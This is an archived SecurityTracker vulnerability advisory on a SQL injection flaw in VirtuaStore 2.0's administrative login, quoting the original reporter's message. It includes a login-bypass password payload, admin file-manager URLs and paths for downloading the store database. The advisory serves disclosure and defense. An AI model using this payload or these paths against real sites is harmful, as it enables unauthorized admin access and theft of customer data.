SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Commerce)  >   VirtuaStore Vendors:   Grupo Virtua Developer
VirtuaStore Input Validation Flaw Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1016421
SecurityTracker URL:  http://securitytracker.com/id/1016421
CVE Reference:   CVE-2006-3402, CVE-2006-3487, CVE-2006-3488   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jul 3 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   supermalhacao of spykids reported a vulnerability in VirtuaStore. A remote user can inject SQL commands.

The administrative interface does not properly validate user-supplied input in the 'password' field. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit password value is provided:

123456 / ' or 1=1

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Cause:   Input validation error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Sat, 1 Jul 2006 03:08:53 -0300
Subject:  Vulnerabilit Virtuastore

Malicious people to compromise a vulnerable system
 
Vulnerabilit Virtuastore (Sql Injection - mdb vulnerabilit)
 
Version(s): 2.0
 
Vendor Confirmed:  Yes  
 
Underlying OS: Windows
 
Exempl.
 
www.site.com.br
www.site.com.br/admin www.site.com.br/adm
 
Login: admin password: 123456 / ' or 1=1
 
Log server (Gerenciador de arquivos)
 
Link browser attacker
www.xxx.com/administrador.asp?link=util&acao=ftp&acaba=sim
www.xxxx.com/administrador.asp?link=util&acao=ftp&acaba=sim&Pasta=D:\dominios\
 
Download mdb intrusion server
/loja/database/virtuastore.mdb
 
/database/virtuastore.mdb
 
The vulnerability has been confirmed in all version
 
#spykids
 
irc.GigaChat.net
 
 
 

 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC